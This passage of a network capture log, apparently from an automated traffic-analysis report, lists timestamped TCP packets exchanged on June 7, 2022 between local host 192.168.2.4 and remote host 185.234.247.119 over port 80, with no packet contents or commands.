                                                                                                                                                                      Jun 7, 2022 18:45:11.768759012 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.768814087 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.768834114 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.768862963 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.769520044 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.769612074 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.769610882 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.769629002 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.769648075 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.769666910 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.769685984 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.769706011 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.769732952 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.769745111 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.769753933 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.769776106 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.769799948 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.769818068 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.769826889 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.769841909 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.769892931 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.789851904 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.795352936 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.795428991 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.795447111 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.795454025 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.795481920 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.795505047 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.795509100 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.795535088 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.795562029 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.795563936 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.795588970 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.795610905 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.795614958 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.795639038 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.795660973 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.795665026 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.795691013 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.795712948 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.799041986 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.799105883 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.799134970 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.799164057 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.799180031 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.799222946 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.799223900 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.799249887 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.799276114 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.799277067 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.799303055 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.799324036 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.799328089 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.799352884 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.799380064 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.799591064 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.799619913 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.799654961 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.799695015 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.799721956 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.799748898 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.799751997 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.799773932 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.799799919 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.799853086 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.799855947 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.799875975 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.799884081 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.799909115 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.799936056 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.799962044 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.799967051 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.799987078 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.799993038 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.800012112 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.800030947 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.802072048 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.802109003 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.802130938 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.802134991 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.802153111 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.802175045 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.802181959 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.802200079 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.802221060 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.802225113 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.802248955 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.802270889 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.802273035 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.802299976 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.802323103 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.802325964 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.802346945 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.802376032 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.802926064 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.802949905 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.802977085 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.802997112 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.803003073 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.803026915 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.803029060 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.803054094 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.803076982 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.803081989 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.803106070 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.803131104 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.803138018 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.803154945 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.803179026 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.803179026 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.803201914 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.803220987 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.803235054 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.803287983 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.822974920 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.828094006 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.828124046 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.828150034 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.828176975 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.828197956 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.828202009 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.828227997 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.828252077 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.828253984 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.828277111 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.828301907 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.828305006 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.828357935 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.828387022 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.828387022 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.828412056 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.828429937 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.828933954 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.828959942 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.828985929 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.829005003 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.829010963 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.829036951 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.829039097 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.829061031 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.829082012 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.829085112 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.829112053 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.829130888 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.829138041 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.829189062 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.829260111 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.829286098 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.829313040 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.829330921 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.835088015 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.835114002 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.835139036 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.835164070 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.835167885 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.835195065 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.835202932 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.835213900 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.835239887 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.835264921 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.835267067 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.835289955 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.835294008 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.835356951 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.836287975 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.836466074 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.836510897 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.836535931 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.836714983 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.836751938 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.836764097 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.836774111 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.836792946 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.836818933 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.836818933 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.836846113 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.836874008 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.837742090 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.837766886 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.837795973 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.837847948 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.837903976 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.838107109 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838133097 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838160038 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838187933 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.838287115 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838313103 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838332891 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.838375092 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838403940 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838423967 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.838428974 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838454962 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838469982 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.838479042 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838505030 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838519096 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.838531017 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838558912 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838583946 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.838583946 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838609934 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838634968 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.838635921 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838676929 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.838757992 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838783979 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838809013 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838828087 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.838835955 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838860989 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838876963 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.838885069 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838910103 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838922977 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.838934898 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838958979 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838984966 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.838988066 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.839009047 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.839024067 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.839034081 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.839087963 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.856741905 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.861577034 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.861618042 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.861645937 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.861670971 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.861697912 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.861712933 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.861725092 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.861742020 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.861752987 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.861778975 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.861804962 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.861807108 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.861833096 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.861860037 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.861871958 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.861885071 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.861915112 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.862996101 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.863035917 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.863063097 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.863087893 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.863109112 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.863111973 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.863142967 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.863146067 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.863171101 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.863195896 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.863197088 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.863223076 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.863225937 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.863248110 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.863271952 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.863272905 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.863298893 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.863349915 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.867783070 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.867821932 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.867847919 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.867875099 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.867903948 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.867929935 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.867943048 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.867955923 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.867980957 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.867981911 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.868005991 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.868031025 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.868036032 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.868056059 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.868066072 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.868082047 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.868107080 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.869143963 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.869182110 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.869232893 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.869256020 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.869278908 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.869282007 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.869307041 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.869309902 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.869333982 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.869360924 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.869370937 CEST4978180192.168.2.4185.234.247.119
